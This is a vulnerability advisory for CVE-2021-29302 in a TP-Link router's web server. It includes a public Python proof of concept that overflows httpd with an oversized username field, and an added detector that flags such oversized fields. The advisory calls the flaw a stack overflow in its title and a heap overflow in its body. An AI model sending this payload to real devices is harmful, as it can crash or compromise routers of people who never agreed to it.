TP-Link stack overflow vulnerability (CVE-2021-29302)
A buffer overflow occurs when the httpd process parses the HTTP body, which may lead to remote code execution. For example, when the router password is set for the first time, the http daemon does not validate the incoming http message; if the transmitted username or password is too long, the httpd process's heap space overflows.
Affected versions:
V4_200 <= 2020.06
The PoC is public: https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302
import requests

# Headers as captured from the router's web UI; Host/Origin/Referer assume
# the router's default address 192.168.0.1. The fixed "Content-Length: 78"
# from the original is dropped: requests computes it from the body, and the
# body below is far longer than 78 bytes.
headers = {
    "Host": "192.168.0.1",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "text/plain",
    "Origin": "http://192.168.0.1",
    "Connection": "close",
    "Referer": "http://192.168.0.1/"
}
# Oversized "name" value (1536 bytes) that overruns the buffer in httpd.
payload = "a" * 512 + "b" * 1024
# TP-Link's form body format: a [/cgi/auth#...] section header followed by key=value lines.
formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\nname={}\r\noldPwd=admin\r\npwd=lys123\r\n".format(payload)
# Routed through a local intercepting proxy (e.g. Burp) on 127.0.0.1:8080;
# remove the proxies argument to send directly.
proxies = {
    "http": "http://127.0.0.1:8080",
}
url = "http://192.168.0.1/cgi?8"
response = requests.post(url, data=formdata, headers=headers, proxies=proxies)
print(response.text)  # Python 3 form; the original used the Python 2 print statement
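A defender-side check, added here and not part of the original page or of TP-Link's firmware: it parses the [/cgi/auth#...] form body format used above and flags any field whose value exceeds a length bound, which is what the httpd parser should have done. The bound of 64 bytes, the function names and the sample bodies are assumptions constructed for this example.

```python
import re
from typing import Dict, List

# Assumed per-field limit; the PoC's name field is 1536 bytes, a legitimate
# router username or password is far shorter.
MAX_FIELD_LEN = 64

# Section header of the form "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3"
SECTION_RE = re.compile(r"^\[(?P<path>/[^#\]]*)#[^\]]*\]\d+,\d+$")


def parse_tplink_form(body: str) -> Dict[str, str]:
    """Parse the key=value lines that follow the [/cgi/...] section header."""
    lines = body.split("\r\n")
    if not lines or not SECTION_RE.match(lines[0]):
        raise ValueError("not a [/cgi/...] form body")
    fields: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"malformed field line: {line[:20]!r}")
        fields[key] = value
    return fields


def oversized_fields(body: str, limit: int = MAX_FIELD_LEN) -> List[str]:
    """Return the names of fields whose value exceeds limit (empty if none).

    A non-empty result is the signal a WAF rule or log monitor would alert on,
    and the condition a hardened httpd would reject before copying the value.
    """
    return [k for k, v in parse_tplink_form(body).items() if len(v) > limit]


# Constructed sample bodies: a normal password change and one shaped like the PoC.
BENIGN = ("[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n"
          "name=admin\r\noldPwd=admin\r\npwd=newpass\r\n")
SUSPECT = ("[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n"
           "name=" + "a" * 1536 + "\r\noldPwd=admin\r\npwd=x\r\n")

if __name__ == "__main__":
    print("benign:", oversized_fields(BENIGN))    # []
    print("suspect:", oversized_fields(SUSPECT))  # ['name']
```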
References:
- https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302
- https://nvd.nist.gov/vuln/detail/CVE-2021-29302